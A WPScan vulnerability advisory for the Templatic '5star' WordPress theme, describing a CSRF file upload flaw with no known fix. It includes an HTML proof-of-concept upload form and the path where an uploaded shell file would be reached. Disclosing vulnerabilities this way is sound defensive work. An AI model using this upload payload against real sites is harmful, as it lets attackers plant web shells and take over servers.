WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

5star by Templatic - CSRF File Upload

Description

The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.

Proof of Concept

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php">
<input name="uploadfile[]" type="file" />
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php

Affects Themes

5star
No known fix

References

URL
https://en.0day.today/exploits/22091

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Jje Incovers

Verified

No

WPVDB ID
80537e03-34fd-47c7-8a8c-6002b109a726

Timeline

Publicly Published

2014-08-01 (about 8 years ago)

Added

2014-08-01 (about 8 years ago)

Last Updated

2021-01-13 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin